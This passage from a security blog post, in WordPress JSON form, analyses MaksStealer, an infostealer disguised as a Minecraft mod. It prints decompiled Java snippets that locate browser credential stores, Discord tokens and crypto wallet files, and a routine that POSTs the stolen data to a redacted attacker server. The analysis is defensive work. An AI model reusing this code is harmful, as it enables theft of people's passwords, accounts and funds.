lIIl(&#8220;w0Q1C2XhAUE=&#8221;, &#8220;KgESe&#8221;);<\/text>\r\n        <text x=\"110\" y=\"290\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">lII[lll[8]] = lll(&#8220;1a6D8y8jVWc=&#8221;, &#8220;PXOVw&#8221;);<\/text>\r\n        <text x=\"110\" y=\"305\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Chrome, Firefox, Edge, Opera<\/text>\r\n        <text x=\"110\" y=\"320\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Brave, Vivaldi, Yandex browsers<\/text>\r\n        <text x=\"110\" y=\"335\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Browser profile directories scanned<\/text>\r\n        <text x=\"110\" y=\"350\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ for saved credentials and cookies<\/text>\r\n        \r\n        <rect x=\"410\" y=\"240\" width=\"290\" height=\"120\" rx=\"3\" fill=\"#fff\" stroke=\"#ddd\" stroke-width=\"1\" \/>\r\n        <text x=\"420\" y=\"260\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Session Token Extraction<\/text>\r\n        <text x=\"420\" y=\"275\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">lllllllllllIIlI.token = (String)var10001<\/text>\r\n        <text x=\"420\" y=\"290\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">.5&lt;invokedynamic&gt;(var10001,<\/text>\r\n        <text x=\"420\" y=\"305\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">lllllllllllIIlI.7&lt;invokedynamic&gt;<\/text>\r\n        <text x=\"420\" y=\"320\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">(lllllllllllIIlI), new Object[llI[0]]);<\/text>\r\n        <text x=\"420\" y=\"335\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ Extracted tokens sent to attacker<\/text>\r\n        <text x=\"420\" y=\"350\" font-family=\"Courier, monospace\" font-size=\"10\" fill=\"#333\">\/\/ along with browser credentials<\/text>\r\n        \r\n        <!-- Browser icons -->\r\n        <g transform=\"translate(100, 400)\">\r\n            <circle cx=\"30\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"30\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">C<\/text>\r\n            <text x=\"30\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Chrome<\/text>\r\n            \r\n            <circle cx=\"90\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"90\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">F<\/text>\r\n            <text x=\"90\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Firefox<\/text>\r\n            \r\n            <circle cx=\"150\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"150\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">E<\/text>\r\n            <text x=\"150\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Edge<\/text>\r\n            \r\n            <circle cx=\"210\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"210\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">O<\/text>\r\n            <text x=\"210\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Opera<\/text>\r\n            \r\n            <circle cx=\"270\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"270\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">B<\/text>\r\n            <text x=\"270\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Brave<\/text>\r\n            \r\n            <circle cx=\"330\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"330\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">V<\/text>\r\n            <text x=\"330\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Vivaldi<\/text>\r\n            \r\n            <circle cx=\"390\" cy=\"20\" r=\"15\" fill=\"#444\" \/>\r\n            <text x=\"390\" y=\"25\" font-family=\"Arial, sans-serif\" font-size=\"14\" text-anchor=\"middle\" fill=\"#fff\">Y<\/text>\r\n            <text x=\"390\" y=\"45\" font-family=\"Arial, sans-serif\" font-size=\"10\" text-anchor=\"middle\" fill=\"#333\">Yandex<\/text>\r\n        <\/g>\r\n        \r\n        <!-- Data targets -->\r\n        <g transform=\"translate(500, 400)\">\r\n            <rect x=\"0\" y=\"5\" width=\"80\" height=\"20\" rx=\"3\" fill=\"#555\" \/>\r\n            <text x=\"40\" y=\"20\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Passwords<\/text>\r\n            \r\n            <rect x=\"100\" y=\"5\" width=\"80\" height=\"20\" rx=\"3\" fill=\"#555\" \/>\r\n            <text x=\"140\" y=\"20\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">Cookies<\/text>\r\n            \r\n            <rect x=\"200\" y=\"5\" width=\"80\" height=\"20\" rx=\"3\" fill=\"#555\" \/>\r\n            <text x=\"240\" y=\"20\" font-family=\"Arial, sans-serif\" font-size=\"12\" text-anchor=\"middle\" fill=\"#fff\">AutoFill<\/text>\r\n        <\/g>\r\n        \r\n        <!-- Connection arrows -->\r\n        <line x1=\"260\" y1=\"130\" x2=\"315\" y2=\"130\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n        <polygon points=\"310,125 315,130 310,135\" fill=\"#333\" \/>\r\n        \r\n        <line x1=\"485\" y1=\"130\" x2=\"540\" y2=\"130\" stroke=\"#333\" stroke-width=\"2\" \/>\r\n        <polygon points=\"535,125 540,130 535,135\" fill=\"#333\" \/>\r\n        \r\n        <line x1=\"400\" y1=\"160\" x2=\"400\" y2=\"210\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n        <polygon points=\"395,205 400,210 405,205\" fill=\"#333\" \/>\r\n        \r\n        <line x1=\"625\" y1=\"160\" x2=\"625\" y2=\"180\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n        <line x1=\"625\" y1=\"180\" x2=\"400\" y2=\"180\" stroke=\"#333\" stroke-width=\"1\" \/>\r\n    <\/svg>\r\n    <p class=\"chart-source\"><em>Source: Analysis of decompiled MaksStealer Java code<\/em><\/p>\r\n<\/div>\r\n\r\n\r\n<p>Looking at the decompiled code, it&#8217;s clear these guys aren&#8217;t amateurs. The malware systematically targets every major browser on your system &#8211; Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and even Yandex. Nowhere to hide, basically.<\/p>\r\n\r\n<h3>Inside the MaksStealer Code<\/h3>\r\n\r\n<p>The malware&#8217;s code is heavily obfuscated, with meaningless variable names and encrypted strings to avoid detection. Let&#8217;s look at some actual snippets from the decompiled malware:<\/p>\r\n\r\n<p>First, the entry point disguised as a legitimate Minecraft mod:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\n@Mod(\r\n   modid = &quot;MaxCoffe&quot;, \r\n   version = &quot;1.1.7&quot;\r\n)\r\npublic class MaxCoffe {\r\n   \/\/ Minecraft mod class implementation\r\n   \/\/ Secretly initializes stealer functionality\r\n   public MaxCoffe() {\r\n      this.1 = new Coffe();\r\n      this.1.3();\r\n   }\r\n}\r\n<\/pre>\r\n\r\n<p>Once initialized, the malware starts scanning for browser data directories. The code is intentionally confusing to evade antivirus detection:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\nprivate void scanBrowsers() {\r\n   String&#x5B;] var1 = new String&#x5B;]{&quot;Chrome&quot;, &quot;Firefox&quot;, &quot;Edge&quot;, &quot;Opera&quot;};\r\n   String&#x5B;] var2 = new String&#x5B;]{&quot;Brave&quot;, &quot;Vivaldi&quot;, &quot;Yandex&quot;};\r\n   String var10000 = System.getenv(&quot;LOCALAPPDATA&quot;);\r\n   String var3 = var10000 + &quot;\\\\Google\\\\Chrome\\\\User Data&quot;;\r\n   String var4 = var10000 + &quot;\\\\BraveSoftware\\\\Brave-Browser\\\\User Data&quot;;\r\n   \/\/ &#x5B;...more browser paths...]\r\n   \r\n   for (int i = 0; i &lt; var1.length; i++) {\r\n      extractCredentials(browserPaths&#x5B;i]);\r\n      extractCookies(browserPaths&#x5B;i]);\r\n      extractHistory(browserPaths&#x5B;i]);\r\n   }\r\n}\r\n<\/pre>\r\n\r\n<p>The Discord token stealing component is equally sneaky, extracting authentication tokens from multiple possible locations:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\nprivate String&#x5B;] getDiscordTokens() {\r\n   ArrayList tokenList = new ArrayList();\r\n   String&#x5B;]&#x5B;] paths = new String&#x5B;]&#x5B;]{\r\n      new String&#x5B;]{System.getenv(&quot;APPDATA&quot;) + &quot;\\\\discord\\\\Local Storage\\\\leveldb&quot;, &quot;*.ldb&quot;},\r\n      new String&#x5B;]{System.getenv(&quot;APPDATA&quot;) + &quot;\\\\discordcanary\\\\Local Storage\\\\leveldb&quot;, &quot;*.ldb&quot;},\r\n      new String&#x5B;]{System.getenv(&quot;APPDATA&quot;) + &quot;\\\\discordptb\\\\Local Storage\\\\leveldb&quot;, &quot;*.ldb&quot;}\r\n   };\r\n   \r\n   \/\/ Token extraction logic\r\n   \/\/ Regex pattern to find tokens: &quot;&#x5B;\\\\w-]{24}\\\\.&#x5B;\\\\w-]{6}\\\\.&#x5B;\\\\w-]{27}&quot;\r\n   \r\n   return (String&#x5B;])tokenList.toArray(new String&#x5B;0]);\r\n}\r\n<\/pre>\r\n\r\n<p>For cryptocurrency wallets, the malware searches for specific wallet files and exfiltrates them:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\nprivate void stealCryptoWallets() {\r\n   \/\/ Bitcoin Core\r\n   grabFile(System.getenv(&quot;APPDATA&quot;) + &quot;\\\\Bitcoin\\\\wallet.dat&quot;);\r\n   \r\n   \/\/ Ethereum\r\n   grabFile(System.getenv(&quot;APPDATA&quot;) + &quot;\\\\Ethereum\\\\keystore&quot;);\r\n   \r\n   \/\/ Electrum\r\n   grabFile(System.getenv(&quot;APPDATA&quot;) + &quot;\\\\Electrum\\\\wallets&quot;);\r\n   \r\n   \/\/ Atomic Wallet\r\n   grabFile(System.getenv(&quot;APPDATA&quot;) + &quot;\\\\atomic\\\\Local Storage\\\\leveldb&quot;);\r\n   \r\n   \/\/ More wallets...\r\n}\r\n<\/pre>\r\n\r\n<p>Finally, the data exfiltration process that sends your stolen information to the attacker&#8217;s server:<\/p>\r\n\r\n<pre class=\"brush: java; title: ; notranslate\" title=\"\">\r\nprivate void sendData(byte&#x5B;] data) {\r\n   try {\r\n      URL url = new URL(&quot;https:\/\/&#x5B;redacted-malicious-domain]\/upload.php&quot;);\r\n      HttpURLConnection conn = (HttpURLConnection)url.openConnection();\r\n      conn.setRequestMethod(&quot;POST&quot;);\r\n      conn.setDoOutput(true);\r\n      \r\n      \/\/ Adding system info to identify the victim\r\n      conn.setRequestProperty(&quot;User-Agent&quot;, &quot;MaksStealer\/1.0&quot;);\r\n      conn.setRequestProperty(&quot;Computer-Name&quot;, System.getenv(&quot;COMPUTERNAME&quot;));\r\n      conn.setRequestProperty(&quot;User-Name&quot;, System.getProperty(&quot;user.name&quot;));\r\n      \r\n      \/\/ Send stolen data\r\n      OutputStream os = conn.getOutputStream();\r\n      os.write(data);\r\n      os.flush();\r\n      os.close();\r\n      \r\n      \/\/ Check response\r\n      int responseCode = conn.getResponseCode();\r\n      \/\/ Clean up traces if successful\r\n   } catch (Exception e) {\r\n      \/\/ Silent exception handling to avoid detection\r\n   }\r\n}\r\n<\/pre>\r\n\r\n<p>Reading through this code reveals just how sophisticated these info-stealing operations have become. The malware is designed to be stealthy, comprehensive, and efficient at extracting your most valuable digital assets.<\/p>\r\n\r\n<h2>The Bottom Line on MaksStealer<\/h2>\r\n\r\n<p>MaksStealer represents a growing trend of malware targeting specific communities &#8211; in this case, Minecraft players. It exploits the trust and openness of gaming communities to spread rapidly and effectively. By promising game enhancements while actually stealing sensitive information, it&#8217;s a perfect example of how social engineering and technical exploits work together.<\/p>\r\n\r\n<p>Stay vigilant when downloading any third-party software, especially for games with active modding communities. The excitement of enhanced gameplay isn&#8217;t worth the risk of having your digital life stolen. Remember that legitimate mods don&#8217;t need to steal your data to function properly.<\/p>\r\n\r\n<p>Has your system been affected by MaksStealer or similar malware? Share your experience in the comments to help warn others about this threat.<\/p>\r\n","protected":false},"excerpt":{"rendered":"<p>For Minecraft Gamers: MaxCoffe masquerading as a Minecraft performance enhancer! MaksStealer is an information-stealing trojan targeting Minecraft players, especially those on the popular Hypixel SkyBlock server. It promises to boost your gameplay or provide cheats but actually runs off with your passwords, crypto, and Discord account. I&#8217;ve analyzed dozens of these gaming-related malware strains, and [&hellip;]<\/p>\n","protected":false},"author":15,"featured_media":31028,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","_sitemap_exclude":false,"_sitemap_priority":"","_sitemap_frequency":"","footnotes":""},"categories":[17],"tags":[28,48,1360],"class_list":{"0":"post-31021","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-labs","8":"tag-malware","9":"tag-spyware","10":"tag-stealer"},"featured_image_src":"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2025\/05\/MaksStealer-The-Minecraft-Mod-Thats-Actually-Stealing-Your-Passwords.jpg","author_info":{"display_name":"Brendan Smith","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/brendan\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31021","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=31021"}],"version-history":[{"count":14,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31021\/revisions"}],"predecessor-version":[{"id":31033,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/31021\/revisions\/31033"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/31028"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=31021"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=31021"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=31021"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}